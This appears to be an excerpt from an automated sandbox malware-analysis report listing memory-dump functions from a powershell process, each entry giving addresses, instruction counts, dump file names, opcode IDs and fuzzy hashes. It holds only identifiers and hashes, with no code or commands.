                                                                        Function 045AA980 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2782f98dd59bc7a0c8c5ac6b23e0a908a7761b93d01381b0fac17a073f68dfc0
                                                                        • Instruction ID: 298928254b04e8982e3e88e1cfd71eeb52d14dd39934942740f7e58d89fa5174
                                                                        • Opcode Fuzzy Hash: 2782f98dd59bc7a0c8c5ac6b23e0a908a7761b93d01381b0fac17a073f68dfc0
                                                                        • Instruction Fuzzy Hash: 9ED12674A01249EFDB15CFA8D584A9DFBF2BF88310F248159E805AB361C771ED42DB90
                                                                        Function 074E467C Relevance: .3, Instructions: 295COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69bc61cfd7e67ce14e0e2457afe5b673bc46fbd2516a0bd96544deeccf71204e
                                                                        • Instruction ID: 4c7bbf251e69a526ceaff8d4affd4e1a646aabdd84e7dfab4a920c10134251b0
                                                                        • Opcode Fuzzy Hash: 69bc61cfd7e67ce14e0e2457afe5b673bc46fbd2516a0bd96544deeccf71204e
                                                                        • Instruction Fuzzy Hash: 30C17CB0B11251DFDB10CB98C540FA9BBA2EF84715F1480A9F905AF791CB72EC42CB91
                                                                        Function 045A731A Relevance: .3, Instructions: 265COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d5322831247856d634328e9ab2fc5ec5b3f20e036dc7388d2713f854b93e5c0
                                                                        • Instruction ID: 8fac72e362daa46e6c29c7f8129a5cb44974006b9df3ee82dea140a543311479
                                                                        • Opcode Fuzzy Hash: 1d5322831247856d634328e9ab2fc5ec5b3f20e036dc7388d2713f854b93e5c0
                                                                        • Instruction Fuzzy Hash: 26A1AE31A00249DFDB14EFA4D944AADBBF2FF88310F158559E806AB364DB34ED59DB80
                                                                        Function 07350048 Relevance: .2, Instructions: 236COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3455795886.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 32392ab1164db0362216cbaff16942114681f41d65d350a1411f1f3d4c01e97c
                                                                        • Instruction ID: bb1ee6765a2b1db79293ec759977cd29ea8179c0c569b211a03657a41f4f275a
                                                                        • Opcode Fuzzy Hash: 32392ab1164db0362216cbaff16942114681f41d65d350a1411f1f3d4c01e97c
                                                                        • Instruction Fuzzy Hash: 8C9162B4B00215DFE718CBA8C455EAABBF2AF89314F14C069D809AB755DB73DC41CB62
                                                                        Function 074E8790 Relevance: .2, Instructions: 233COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ef336f150b291c3a88514698bb50e1e07855af7ee58df2c436beaff558b033b
                                                                        • Instruction ID: 1a2be5bd017f75cc4ece8cdae486ae46ff9ddc8ced054684d9a6369a7eec1e73
                                                                        • Opcode Fuzzy Hash: 1ef336f150b291c3a88514698bb50e1e07855af7ee58df2c436beaff558b033b
                                                                        • Instruction Fuzzy Hash: 38714BB5B00216DFCF159B6888002FBBBADAFC6222F14847BD845DB341EB31D845C7A2
                                                                        Function 07350000 Relevance: .2, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3455795886.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6d4c668de1be1d488cf6915e36a164bc42e9ee764d706ca0592d5fa1602469b
                                                                        • Instruction ID: ecd4f7b82b050008cd82d4e0e2bfb04e3fbdaaf1b4799b414048c15690d34a8c
                                                                        • Opcode Fuzzy Hash: b6d4c668de1be1d488cf6915e36a164bc42e9ee764d706ca0592d5fa1602469b
                                                                        • Instruction Fuzzy Hash: E9916FB4A00245DFDB19CFA8C455E99BBB2AF89314F198099D809AF752D733DC41CB62
                                                                        Function 045A2AA0 Relevance: .2, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bc8c701ddd9194ade4f9e9031e27609e83fc864800fcba4cd477a68e3fe2cda9
                                                                        • Instruction ID: 73bb9bbc4057bd3903313b89416fafcb2ad2bd3c4da286966777219351ecc895
                                                                        • Opcode Fuzzy Hash: bc8c701ddd9194ade4f9e9031e27609e83fc864800fcba4cd477a68e3fe2cda9
                                                                        • Instruction Fuzzy Hash: 10918C74A04209DFCB06CF59D495AAEFBB1FF88310B248699E5459B3A1C735FC51CBA0
                                                                        Function 08DF0448 Relevance: .2, Instructions: 216COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c46a8b34859f534cf0adfc6893420639da858388c575592d185a5e0cae387aa9
                                                                        • Instruction ID: 7eb9093137b1d3efd338e3f48f424aaa967434d6152a2d1964e1d9076897e9a0
                                                                        • Opcode Fuzzy Hash: c46a8b34859f534cf0adfc6893420639da858388c575592d185a5e0cae387aa9
                                                                        • Instruction Fuzzy Hash: 1F817C30B00615CFDB15DBA9D840AAEBBF2FFC8341F158569D505AB356DB74AC06CBA0
                                                                        Function 074E79D0 Relevance: .2, Instructions: 192COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86d3e32557e5ea9a8a215a809f19322ea41cc8eedf4df519eb5849237d2c2db9
                                                                        • Instruction ID: cf943624ccb3ed9dc047386aab7f50a1bf835ad3400a968bd57a35465398d34e
                                                                        • Opcode Fuzzy Hash: 86d3e32557e5ea9a8a215a809f19322ea41cc8eedf4df519eb5849237d2c2db9
                                                                        • Instruction Fuzzy Hash: 8A71AEB4E00205DFDB15CFA8C440AAABBB6BF85335F14C16AD905AB705DB71EC42CB92
                                                                        Function 045A7BD6 Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 315610fbe63bdb2869fcbdc5a60abf6fb65fc301513ee978bf58bf8d7b5c723b
                                                                        • Instruction ID: 2d00ab999c5ef4f36d5a5e8bd5f7e74e180b274cb2b8a1e3ebd2ebe64ad075ab
                                                                        • Opcode Fuzzy Hash: 315610fbe63bdb2869fcbdc5a60abf6fb65fc301513ee978bf58bf8d7b5c723b
                                                                        • Instruction Fuzzy Hash: 96715D70E00248DFDB14DFA4D894AADBBF2BF88304F158469D412AB790DB71AD5ADB90
                                                                        Function 074E79AD Relevance: .2, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8138843886a55cd9a0e8dc0c2e465b2f070f05ea52212de4dc74a46710a49e9
                                                                        • Instruction ID: 75e53cd42e1a3576bfeb46fe9df1a14598dd87953ab70006f3aa36e4f9cb2e5a
                                                                        • Opcode Fuzzy Hash: c8138843886a55cd9a0e8dc0c2e465b2f070f05ea52212de4dc74a46710a49e9
                                                                        • Instruction Fuzzy Hash: 9B6191B4A00245DFDB16CF58C490AEABBB6BF85335F14C1ABD844AB355C732E846CB51
                                                                        Function 045A7A53 Relevance: .2, Instructions: 164COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3ab83d9482f2df32bc474194c438785b1865dacaa1c4c634e7e0051188108c4
                                                                        • Instruction ID: 2f5fe906638afe464ea6da4aaa8daf3f214c72da0d56d895e6b154b7f8a12c2e
                                                                        • Opcode Fuzzy Hash: d3ab83d9482f2df32bc474194c438785b1865dacaa1c4c634e7e0051188108c4
                                                                        • Instruction Fuzzy Hash: 97619A70A00209DFDB15DF68C890AAEBBB2FF89314F14896DD4069B751DB71AD5ACB80
                                                                        Function 045AD627 Relevance: .2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 39265d914742c8568ebcdef0d9e9a3f9ddd859adbaee750a10de2e647d8041c3
                                                                        • Instruction ID: 572a6ea983f039c9bcce66e01ef10c964f1b9c7d404aeb0a792bfd69c6b96622
                                                                        • Opcode Fuzzy Hash: 39265d914742c8568ebcdef0d9e9a3f9ddd859adbaee750a10de2e647d8041c3
                                                                        • Instruction Fuzzy Hash: 9151A630A002449FDB05DB78C8546AEBFF3EFC5310F1984AED445AB756CE749C468BA1
                                                                        Function 08DF2631 Relevance: .2, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ee1c08bd329c88de3af2215ac0b94eb8c32d200203df30c846e6d7850a3e3d8
                                                                        • Instruction ID: a0c7656c699e3d0862fd27d395938d8c9b9e523912c3971696d17b02b5f61248
                                                                        • Opcode Fuzzy Hash: 4ee1c08bd329c88de3af2215ac0b94eb8c32d200203df30c846e6d7850a3e3d8
                                                                        • Instruction Fuzzy Hash: B7515334A04685CFCB16CF5CC8909AEBBB2FF49310B258259E955EB3A6C335EC51DB90
                                                                        Function 08DF10D0 Relevance: .1, Instructions: 143COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 702aad8be26a4182debd2a3059a36cbcea3d051d2bccda16df84673ace507c1e
                                                                        • Instruction ID: 2405933e4f4249943bf7d8c0407fe6b570d62792f46f31db7c28872457245370
                                                                        • Opcode Fuzzy Hash: 702aad8be26a4182debd2a3059a36cbcea3d051d2bccda16df84673ace507c1e
                                                                        • Instruction Fuzzy Hash: 4C516034A05245DFCB06CF9CC9809ADBBB2FF49320F258299D954EB3A2D335AC41CB90
                                                                        Function 074E2050 Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff218fdf5173f2254ab47cc40aa7de05567cf7db570764131dbadf5c1eccbd30
                                                                        • Instruction ID: d2230dab81d70030563e672b5ed6bda86791fc84246c4f0369a93768e3bd458a
                                                                        • Opcode Fuzzy Hash: ff218fdf5173f2254ab47cc40aa7de05567cf7db570764131dbadf5c1eccbd30
                                                                        • Instruction Fuzzy Hash: 464107F1A00656DFCB258F649840BFBBBBEBF85262B49409BD9048F352D771C941C7A2
                                                                        Function 074E3E00 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4788d3ed25b535dbe6e205581e30b50a75153368125353af7c53f47e523ab220
                                                                        • Instruction ID: c93251b48e33c40303ed02125fcd7ad3b80c378867850c6fcfd16cd2b517bb56
                                                                        • Opcode Fuzzy Hash: 4788d3ed25b535dbe6e205581e30b50a75153368125353af7c53f47e523ab220
                                                                        • Instruction Fuzzy Hash: 964137B2B002159BCB259E6DC8406FBB7B9EFC4622B14856BC919E7301DF31D915C7E1
                                                                        Function 045A77F9 Relevance: .1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b950ad048d44fb20e1ccf621fef3462e7029ff2be55efc6e1a1b8e2659542e7f
                                                                        • Instruction ID: 36b1abd42456b517b1f0fb2b85346ff6f60b80560542b85b32b6e4929794dbf7
                                                                        • Opcode Fuzzy Hash: b950ad048d44fb20e1ccf621fef3462e7029ff2be55efc6e1a1b8e2659542e7f
                                                                        • Instruction Fuzzy Hash: 6F417035A002459FDB15EB74D854AAE7BB6FF8D351F084469E802EB7A0CB34AC42DB90
                                                                        Function 08DF20B2 Relevance: .1, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5302125ab110cd007966516b2f334382ad3cb13e702c42803f86051def7dd850
                                                                        • Instruction ID: 763ff9664621d4d0f9a791d35afd504d1ccfd913a9db5c36afee4938498b51d4
                                                                        • Opcode Fuzzy Hash: 5302125ab110cd007966516b2f334382ad3cb13e702c42803f86051def7dd850
                                                                        • Instruction Fuzzy Hash: E6412D74A00119DFCB05CF9CC994AAEB7F1FF88310B258269EA15AB3A5C735EC51CB94
                                                                        Function 045AD680 Relevance: .1, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b26fc525af0613a1bbc95230d2c59816a11b6fd77fd78ea16d1d5272eb095703
                                                                        • Instruction ID: 5ea73315c6cc14e52292e2fd2953d6e9b034b820ebe6b6fb67f02e7777769f8b
                                                                        • Opcode Fuzzy Hash: b26fc525af0613a1bbc95230d2c59816a11b6fd77fd78ea16d1d5272eb095703
                                                                        • Instruction Fuzzy Hash: 35410030B00104DFDB18EBB9C8547AEBAF7AFC9310F148469D806AB755DE75AC469BA0
                                                                        Function 08DF07B1 Relevance: .1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ef33c469feeeee7506a2fac14b9849b222151dda566a27c1bc2351de4b10cd6
                                                                        • Instruction ID: 906f0d84ba123290de8f4d6eced66691f58f6fe9c2aaceb2fd0e48946e31d5c9
                                                                        • Opcode Fuzzy Hash: 0ef33c469feeeee7506a2fac14b9849b222151dda566a27c1bc2351de4b10cd6
                                                                        • Instruction Fuzzy Hash: 61417F70A05645AFCB05CF58C9949AABBF1FF89320B15829AD944EB253C335EC45CBA0
                                                                        Function 045A2BB1 Relevance: .1, Instructions: 112COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cb5c30864db241c8390f49b6ec85963d91428142341c2bb187b43c8aa0c8ce1
                                                                        • Instruction ID: df8ab5e19850589d186592ffc2295afdaa09486f916f6ecae9bc3f6791e4cea5
                                                                        • Opcode Fuzzy Hash: 5cb5c30864db241c8390f49b6ec85963d91428142341c2bb187b43c8aa0c8ce1
                                                                        • Instruction Fuzzy Hash: 76412574A00509DFCB09CF59D5959AEFBB1FF48310B118699E906AB365C732FCA1CBA0
                                                                        Function 08DF16E2 Relevance: .1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22cc2c006f2130ba37414d306b2bf212f5e12ab0d3abdb9a8e9c85c45c97e51b
                                                                        • Instruction ID: 720b0a8f17189f429199866a183fe8217cba3bd942e5f6386375cb53165043e7
                                                                        • Opcode Fuzzy Hash: 22cc2c006f2130ba37414d306b2bf212f5e12ab0d3abdb9a8e9c85c45c97e51b
                                                                        • Instruction Fuzzy Hash: EF411A74E10109DFCB05CF9CC9809AEBBF2FF88360B258268E915A7365C731AC52DB90
                                                                        Function 045A7810 Relevance: .1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 04d9264a353000beca295d13dbc7965b8cdb16f35073adffbaedfc8ab94a1ff7
                                                                        • Instruction ID: 81b62ea96e15f1f99fc9ef6069c0c2f51e6a1ae231b3928a4e4ed5120f9d22a5
                                                                        • Opcode Fuzzy Hash: 04d9264a353000beca295d13dbc7965b8cdb16f35073adffbaedfc8ab94a1ff7
                                                                        • Instruction Fuzzy Hash: 70415035B002049FDB14EB64D854AAE7BF6FF8C755F044468E806EB7A0CB34AD52DB90
                                                                        Function 074E7818 Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f709f4ce7367aac9f36d3f81b0578a2625a2febb0a6faa743807dbeb92be7b2
                                                                        • Instruction ID: 7565d4cebeaf5d687738c916687921d8b4badf1de135fde8a015e15acee2c3a0
                                                                        • Opcode Fuzzy Hash: 8f709f4ce7367aac9f36d3f81b0578a2625a2febb0a6faa743807dbeb92be7b2
                                                                        • Instruction Fuzzy Hash: 4E31F8B4B00210DBE70497B4C814FEE7AA7AFC5750F548069E9056F785CF759C468BA2
                                                                        Function 074E8770 Relevance: .1, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8379fc85f7bc322f433382711fbb250f1ca099e65f76819fc5b35ba6f695fb45
                                                                        • Instruction ID: 48ab88174004f143c146171319f7965dbd76bafe9226be20bff865bc4e7f4957
                                                                        • Opcode Fuzzy Hash: 8379fc85f7bc322f433382711fbb250f1ca099e65f76819fc5b35ba6f695fb45
                                                                        • Instruction Fuzzy Hash: 832126F56042528FDF118B2498007FA7FAD9FC6265F0450BBD844CB392EB769985C7A2
                                                                        Function 045AA93A Relevance: .1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 90635258db90fa96c66e34404daffc153151c2231c3ea3d01c9f283bbb252745
                                                                        • Instruction ID: f3b35c0162c437a898770c0f2e792c2ef20bfba46de357d8f19685ffe2213893
                                                                        • Opcode Fuzzy Hash: 90635258db90fa96c66e34404daffc153151c2231c3ea3d01c9f283bbb252745
                                                                        • Instruction Fuzzy Hash: BA316D75A052858FCB02CFA8D8909AABBB0FF4A310B154196D545EB392D334ED45CFA1
                                                                        Function 02CEF520 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 59448a3b763204713bd88d80bfc2a8f9cbbc521b9340bed5a4601ed9b6664b69
                                                                        • Instruction ID: 61741a971fed9c91590380d78f935afeb58bdd324388e6cdd90ea38c87375930
                                                                        • Opcode Fuzzy Hash: 59448a3b763204713bd88d80bfc2a8f9cbbc521b9340bed5a4601ed9b6664b69
                                                                        • Instruction Fuzzy Hash: AA2141B6500300EFDF14CF10D9C0B26BFA1FB88318F20C5ADE90A0A656C336C816CB61
                                                                        Function 02CEF614 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 379ad975784910339a00c89bf722f8ca172fc4ded4efa364eb9771786b0e2ab2
                                                                        • Instruction ID: 584744d5246f851c592c08788fcb5ba34002cf60396ea637f66e5336db9d079c
                                                                        • Opcode Fuzzy Hash: 379ad975784910339a00c89bf722f8ca172fc4ded4efa364eb9771786b0e2ab2
                                                                        • Instruction Fuzzy Hash: BA2105F1604244DFDB04DF24D5C0B26BBA9FB84718F20C56DD90A4B661C77AD846CA61
                                                                        Function 02CEF51B Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                        • Instruction ID: ebe6926777e183c08628477ff765b3286f50903784912a14ee53deacc6abb68b
                                                                        • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                        • Instruction Fuzzy Hash: 85218E76504240DFCF16CF10D9C4B16BF61FB84318F24C5ADD90A4A666C33AD556CB91
                                                                        Function 02CEF60F Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54e937d2f642825418ee9ae18dedb5dcdd39905f3497500ca018ffbd85fd39bc
                                                                        • Instruction ID: 8c5a3ad11937ac639e1def64eafb25b474773d693a2ecc3365986f7731741deb
                                                                        • Opcode Fuzzy Hash: 54e937d2f642825418ee9ae18dedb5dcdd39905f3497500ca018ffbd85fd39bc
                                                                        • Instruction Fuzzy Hash: 3F11E0B6504684CFCB05DF20D6C4B15BBA1FB84318F24C6ADC84A4BA62C33AD54ACB52
                                                                        Function 02CED005 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
